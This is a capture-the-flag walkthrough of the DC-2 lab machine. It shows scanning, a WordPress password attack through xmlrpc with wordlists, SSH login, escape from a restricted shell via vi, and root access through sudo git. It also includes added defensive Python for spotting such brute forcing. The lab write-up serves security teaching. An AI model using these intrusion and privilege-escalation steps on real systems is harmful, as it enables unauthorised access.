DC-2 Target Machine Penetration Test Summary and Full Walkthrough

Lab environment

┌──(root㉿kali)-[~]
└─# uname -a       
Linux kali 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 GNU/Linux

Target VM download: http://www.five86.com/downloads/DC-2.zip

Reconnaissance

  • Host discovery
┌──(root㉿kali)-[~]
└─# nmap -sn 10.0.2.0/24   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-20 10:21 EST
Nmap scan report for 10.0.2.1
Host is up (0.00031s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 10.0.2.2
Host is up (0.00018s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 10.0.2.3
Host is up (0.00018s latency).
MAC Address: 08:00:27:4F:33:99 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.2.5
Host is up (0.00065s latency).
MAC Address: 08:00:27:18:56:06 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.2.4
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds
  • Site home page (if it fails to load, remember to edit the hosts file; on Linux it is /etc/hosts)

[screenshot omitted]

  • Host ports and services
┌──(root㉿kali)-[~]
└─# nmap -p- -sV 10.0.2.5  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-20 10:28 EST
Nmap scan report for 10.0.2.5
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 08:00:27:18:56:06 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.08 seconds
  • Public information gathering

Apache 2.4.10 has a file-parsing vulnerability, but there is no upload point; beyond that there is no usable exploit, and nothing useful turned up in msfdb.

WordPress 4.7.10 has the WordPress REST API content injection vulnerability, but there is no exploit for it.

  • Vulnerability scan with wpscan
wpscan --update # update the vulnerability database

Run the information scan:

┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [10.0.2.5]
[+] Started: Mon Nov 20 11:24:54 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Nov 20 11:24:59 2023
[+] Requests Done: 171
[+] Cached Requests: 5
[+] Data Sent: 39.584 KB
[+] Data Received: 356.633 KB
[+] Memory used: 260.359 MB
[+] Elapsed time: 00:00:04

The report looks fairly clean; if nothing else works later, consider getting an API token and scanning again.

Testing

flag1

Inspecting the home page source, we find flag1 directly:

[screenshot omitted]

flag2

From flag1's hint we know the next flag is related to users, which most likely means getting into the site's admin backend; it also mentions cewl. Let's enumerate usernames first:

wpscan --url http://dc-2/ -e u

This gives the following result:

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

CeWL (Custom Word List Generator) is a tool for generating custom word lists. It is commonly used in penetration testing and information gathering to build dictionaries for password cracking or other security tests. Some key points about CeWL:

  1. Uses

    • Penetration testing: CeWL can generate candidate username and password lists during a penetration test for password-cracking attempts.
    • Information gathering: it can extract keywords from a specific website or text to build a custom dictionary and get a better picture of the target.
  2. How it works

    • CeWL crawls a given website or analyses a text file and extracts the words and phrases in it. It ignores some common words such as conjunctions and stop words, so the resulting list is more useful.
    • Users can tune the extraction through parameters, for example setting a minimum word length or excluding specific domains.
  3. Command-line tool

    • CeWL is a command-line tool; you run it from a terminal or command prompt.
  4. Example

    • A simple CeWL command:

      cewl http://example.com -w custom_wordlist.txt

      This crawls http://example.com, extracts the words on the page, and saves them to a file named custom_wordlist.txt.

  5. Customisation options

    • Command-line options let you customise CeWL's behaviour, for example excluding specific domains, setting the crawl depth, or setting the user agent.

We extract keywords directly to build the dictionary:

┌──(root㉿kali)-[~]
└─# cewl http://dc-2/index.php/flag/ -w ~/Desktop/dc-2.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
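The following Python is an added example, not code from the original post or from CeWL itself: it reimplements the core of what CeWL does (visible-text word extraction with a length filter and stop-word removal) and then uses the resulting word set for the defender-side check this box motivates, rejecting a password that is a word published on the site's own pages. The HTML, the stop-word list and the minimum length are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed sample page standing in for a fetched site; the Latin words are the
# kind of public text from which the DC-2 passwords were drawn.
SAMPLE_HTML = """<html><head><title>Lorem ipsum</title>
<style>.hero { color: red; }</style></head>
<body><h1>Welcome to the site</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla
parturient montes, nascetur ridiculus mus.</p>
<script>var ignored = "javascriptword";</script></body></html>"""

# Minimal stop-word list (assumption); CeWL ships a longer one.
STOP_WORDS = {"the", "and", "to", "of", "a", "in", "is", "it", "for"}

class _TextExtractor(HTMLParser):
    """Collects visible text only, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def extract_words(html, min_length=3):
    """CeWL-style extraction: visible words, lower-cased, length-filtered, stop words dropped."""
    parser = _TextExtractor()
    parser.feed(html)
    words = set()
    for word in re.findall(r"[A-Za-z]+", " ".join(parser.chunks)):
        lowered = word.lower()
        if len(lowered) >= min_length and lowered not in STOP_WORDS:
            words.add(lowered)
    return words

def password_from_site_content(password, site_words):
    """Defender-side check: is this password a word published on the site itself?"""
    return password.lower() in site_words
```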

Then hand-write a username dictionary, load it into Burp Suite, and capture the login request for this version of WordPress:

[screenshot omitted]

Select the parameters, load the corresponding dictionary into each position, and start the attack; when it finishes we have two passwords, and admin fails:

[screenshot omitted]

wpscan can of course do this as well:

wpscan --url http://dc-2 -U ~/Desktop/Code/usr.txt -P ~/Desktop/dc-2.txt

The report shows the following:

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                               
[SUCCESS] - tom / parturient                                                                                                 
Trying admin / ridiculus Time: 00:00:48 <============================                    > (699 / 1175) 59.48%  ETA: ??:??:??
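From the defender's side, the burst of POSTs to xmlrpc.php that the wpscan password attack above produces is easy to spot in the Apache access log. The following Python is an added example, not from the original post: it parses constructed combined-format log lines (the client addresses, timestamps and the WPScan user-agent string are made up to mirror the scan above) and reports clients that exceed a POST threshold, which is itself an assumption to tune.

```python
import re
from collections import Counter

# Constructed Apache combined-format lines standing in for /var/log/apache2/access.log.
# Client IPs, timestamps and user-agent strings are made up to mirror the wpscan run.
SAMPLE_LOG = """\
10.0.2.4 - - [20/Nov/2023:11:30:01 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
10.0.2.4 - - [20/Nov/2023:11:30:01 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
10.0.2.4 - - [20/Nov/2023:11:30:02 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
10.0.2.4 - - [20/Nov/2023:11:30:02 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
10.0.2.4 - - [20/Nov/2023:11:30:03 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
10.0.2.9 - - [20/Nov/2023:11:30:05 -0500] "GET /index.php/flag/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.2.9 - - [20/Nov/2023:11:30:09 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None

def find_xmlrpc_bruteforce(log_text, threshold=5):
    """Count POSTs to xmlrpc.php per client and flag those at or above `threshold`
    (the threshold is an assumption for this excerpt; tune it to your traffic).
    Also returns clients whose user agent names WPScan, which is an immediate tell."""
    posts = Counter()
    scanner_ips = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if "wpscan" in rec["ua"].lower():
            scanner_ips.add(rec["ip"])
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0].endswith("/xmlrpc.php"):
            posts[rec["ip"]] += 1
    suspects = {ip: n for ip, n in posts.items() if n >= threshold}
    return suspects, scanner_ips
```

A single legitimate pingback or mobile-app login also POSTs to xmlrpc.php, so the count per client and the time span matter more than the path alone.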

We then log into jerry's backend and find flag2

[screenshot omitted]

flag3

From the hint, we guess we either need to get into the admin account or that something is hidden in the site's directories; but brute forcing depends entirely on your dictionary, so the only route likely to work is an SSH login:

We try SSH logins with the two known usernames; if needed we can fall back to directory or login brute forcing later:

┌──(root㉿kali)-[~]
└─# ssh -p 7744 tom@10.0.2.5
tom@10.0.2.5's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

tom can log in successfully, and the shell turns out to be a restricted shell (rbash). We try the usual commands and finally read flag3 with less:

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ sudo -l
-rbash: sudo: command not found
tom@DC-2:~$ cat /etc/passwd
-rbash: cat: command not found
tom@DC-2:~$ ll
-rbash: ll: command not found
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ ls -a
.  ..  .bash_history  .bash_login  .bash_logout  .bash_profile  .bashrc  flag3.txt  .profile  usr
tom@DC-2:~$ less flag3.txt

[screenshot omitted]

flag4

From flag3's hint we know the next step is privilege escalation, then looking for clues in the jerry account. Trying the usual commands, we find that vi is not disabled, so we use it to break out:

[screenshot omitted]

Open any file with vi, press Esc to enter command mode, set the shell option with :set shell=/bin/sh and press Enter; when that finishes, enter command mode again and type :shell to drop into an sh command line. bash works too; I tried both and both work:

[screenshot omitted]

Once in bash we try modifying environment variables to escape the restrictions:

[screenshot omitted]

Next we switch user, look in that user's home directory, and get flag4

[screenshot omitted]

flag5

Going by flag4, is there really no hint? No: note the last sentence, which mentions git; that is definitely there to cause trouble (kidding)

Back in the shell, let's try it:

[screenshot omitted]

So we try privilege escalation through git: in the terminal, run sudo git -p help

[screenshot omitted]

At the bottom left there is a prompt line; typing !/bin/bash there drops straight into a root shell

[screenshot omitted]
